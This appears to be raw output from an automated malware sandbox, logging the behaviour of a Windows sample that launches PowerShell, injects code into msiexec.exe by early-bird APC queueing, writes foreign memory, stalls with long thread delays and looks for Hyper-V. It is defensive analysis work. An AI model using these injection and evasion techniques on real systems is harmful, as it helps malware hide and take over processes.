Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7926			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1730			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5560	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6520	Thread sleep time: -70000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Code function: 0_2_00405629 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405629
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Code function: 0_2_004060E4 FindFirstFileW,FindClose,	0_2_004060E4
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: ModuleAnalysisCache.2.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.2633960829.000000000593A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\eq
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.2633960829.000000000593A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\eq
Source: powershell.exe, 00000002.00000002.2633960829.000000000593A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\eq
Source: msiexec.exe, 00000006.00000002.3919635196.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147600685.0000000000C44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	API call chain: ExitProcess graph end node			graph_0-2951
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	API call chain: ExitProcess graph end node			graph_0-3092

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_04AE77F9 LdrInitializeThunk,

2_2_04AE77F9

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

Code function: 0_2_0040610B GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0040610B

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Early bird code injection technique detected

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 41F0000

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
